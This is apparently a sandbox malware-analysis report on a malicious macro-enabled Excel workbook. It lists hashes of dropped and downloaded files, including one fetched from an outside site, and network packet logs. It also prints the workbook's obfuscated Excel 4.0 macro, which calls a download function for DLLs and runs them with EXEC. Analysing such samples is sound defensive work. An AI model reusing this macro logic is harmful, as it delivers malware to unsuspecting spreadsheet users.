SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 185404 |
Entropy (8bit): | 6.206741223040736 |
Encrypted: | false |
SSDEEP: | 1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo |
MD5: | 7D7BDC559AE699579A700645D0FD5F03 |
SHA1: | C4C0CA6B2B7779D870B0B69E5D7001453BABBFF0 |
SHA-256: | 0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524 |
SHA-512: | 3A815F4CEE13B0D491E6C527D30DB0FB9E77FB489F606539E8026A3C2797A3A52672378B9B0788C5DFD5953ECB11D1BA5F2AE30F493CDBBB42A49E42E4278016 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
IE Cache URL: | https://shalombaptistchapel.com/ds/0604.gif |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 97555 |
Entropy (8bit): | 7.878354858676539 |
Encrypted: | false |
SSDEEP: | 1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfn5mw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mf |
MD5: | E4735BE32837B3EFD70C66BB5547CA81 |
SHA1: | 90748B338652039E32B449C0E35FA43A90A5D0C7 |
SHA-256: | 5338F8519CE6018CD4EB19F7E2144BEAC3DDF7CE8D440596BEF9B540A1AF26AE |
SHA-512: | ACEBCDC169CF8040B8E6C6184191DFC076F33A90CD29942667D1C7B69F413E26FA51B9AAF033968BD3EEC2BFA79C0777AE7B3A3EF164BDD5538FF73ACB697E33 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 909 |
Entropy (8bit): | 4.695304331247972 |
Encrypted: | false |
SSDEEP: | 12:8MpJRUxLv6CHiMGWxeGXADWB+W+jA0/y1bDyZTLkeGLkeM4t2Y+xIBjKZm:8SWkWxP6WqA0KJDyj7aB6m |
MD5: | 8F1A3FB730EC3A8F5EC8A158DDE95C94 |
SHA1: | F0037E120763C2536758705A1E5235A0848BEF08 |
SHA-256: | F04FF42E981BDFFFCB061FF7D090A24F9718CE263FAC27B4938E5C020B579684 |
SHA-512: | 6CC8C208C4086722A4E664A617A93743E098E4E60A96E90772ACA26BF0C1CD6400076CE6560602E9DCE01199049ABA7A02A9A81429D9AC38E04E44DA467F67A8 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2230 |
Entropy (8bit): | 4.738436789765632 |
Encrypted: | false |
SSDEEP: | 24:82kWxP2WiJK96AKKpK9UDyT7aB6my2kWxP2WiJK96AKKpK9UDyT7aB6m:82kW52WiEKKpB6p2kW52WiEKKpB6 |
MD5: | 7C8FCA6F65C18FA8210897F28E263325 |
SHA1: | FC9C467A52B14EB7BAB72604F8BC485ADB129D6C |
SHA-256: | A974DE374090319C6A50CD5E4B2F3EE3C11D311DC43DED69A0A3479671B7A11C |
SHA-512: | 130F0D52D75CE5DB0F67EB64C020EF5F649F6B557F1108D9E0DD362DFB44DB3ED4903C2EC6AECC5F0C38479A34DB5072F61C824AA5793D5506102C6CB804DBB4 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.66882021623009 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LRng9CZELRng9CmxWKS9LRng9Cv:dj49LJQgELJQC9LJQs |
MD5: | 359F4F243B208E2F7BEC4696161C1C56 |
SHA1: | 2EC141564445F34EA03BB20E2F8237AEB9D50C00 |
SHA-256: | 7FEFA1E5026005C1DBE4548936836F0817E4EEEC59595287FBA1CE9208CE2632 |
SHA-512: | 4B54C65A070E885723625AE74B2C8A69FE84783FFE9F33748BDF284DE7D0547462C951228CEFBB1DE35B21BF06C982FCE1120C486DA6ABBA1F98F8B8150E70F8 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 97555 |
Entropy (8bit): | 7.878354858676539 |
Encrypted: | false |
SSDEEP: | 1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfn5mw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mf |
MD5: | E4735BE32837B3EFD70C66BB5547CA81 |
SHA1: | 90748B338652039E32B449C0E35FA43A90A5D0C7 |
SHA-256: | 5338F8519CE6018CD4EB19F7E2144BEAC3DDF7CE8D440596BEF9B540A1AF26AE |
SHA-512: | ACEBCDC169CF8040B8E6C6184191DFC076F33A90CD29942667D1C7B69F413E26FA51B9AAF033968BD3EEC2BFA79C0777AE7B3A3EF164BDD5538FF73ACB697E33 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185404 |
Entropy (8bit): | 6.206741223040736 |
Encrypted: | false |
SSDEEP: | 1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo |
MD5: | 7D7BDC559AE699579A700645D0FD5F03 |
SHA1: | C4C0CA6B2B7779D870B0B69E5D7001453BABBFF0 |
SHA-256: | 0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524 |
SHA-512: | 3A815F4CEE13B0D491E6C527D30DB0FB9E77FB489F606539E8026A3C2797A3A52672378B9B0788C5DFD5953ECB11D1BA5F2AE30F493CDBBB42A49E42E4278016 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.878779807636458 |
TrID: |
|
File name: | documents-1819557117.xlsm |
File size: | 98253 |
MD5: | 4dd14d22cd0272ae24128bb1356a842c |
SHA1: | abf7d941f4ebf949816c5576060bfce76f836ae9 |
SHA256: | f06910daadc7c66c8e9064d0719ed6727d69c1f04ab13566cadbb6e7a9f52a7e |
SHA512: | ccba2a4ea072bf9363c4d22d8668d0df99b8101fbcf9fd3f881267fa78cfde954aa749fa92907cf5ed0f700b29e538e2c258117e67b3374525c5a751ab036784 |
SSDEEP: | 1536:nSRSI4oWt6JJwQz8jbzPmHnsBjFC6QomaIRUxPLe96bGAfe2hawpx:nSE7oWt6Xz8jbzP0n4BC6Qdkx60WMD |
File Content Preview: | PK..........!.\lC.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "documents-1819557117.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM24,'Doc1'!AO15&""1""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM25,'Doc1'!AO15&""2""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM26,'Doc1'!AO15&""3""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM27,'Doc1'!AO15&""4""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)='Doc1'!AO20()=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)"
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\ghnrope""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP108)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP109)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 9, 2021 16:32:49.619826078 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:49.637772083 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:32:49.637875080 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:49.638366938 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:49.698909998 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:32:50.025616884 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:32:50.025829077 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:50.025876999 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:32:50.025898933 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:50.025938034 CEST | 49705 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:50.044636965 CEST | 80 | 49705 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:32:50.049861908 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:50.067761898 CEST | 80 | 49707 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:32:50.067909956 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:50.068398952 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:50.130856037 CEST | 80 | 49707 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:32:50.458079100 CEST | 80 | 49707 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:32:50.458324909 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:50.458386898 CEST | 49707 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:32:50.476417065 CEST | 80 | 49707 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:32:50.630471945 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:50.777673960 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:50.778187990 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:50.779658079 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:50.927629948 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:50.934895039 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:50.934953928 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:50.934982061 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:50.935080051 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:50.935117006 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:50.947853088 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.096577883 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.096704960 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.097331047 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.270441055 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.270473003 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.270489931 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.270507097 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.270545006 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.270581007 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.270590067 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.270593882 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.270633936 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.270648003 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.271066904 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.271090984 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.271104097 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.271140099 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.271168947 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.417557001 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.417587996 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.417694092 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.417711973 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.417733908 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.417783976 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418159008 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418237925 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418329000 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418351889 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418370962 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418386936 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418421984 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418453932 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418607950 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418680906 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418698072 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418715954 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418746948 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418750048 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418790102 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418802977 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418826103 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418855906 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:32:51.418881893 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418916941 CEST | 49708 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:32:51.418936014 CEST | 443 | 49708 | 162.251.80.27 | 192.168.2.5 |
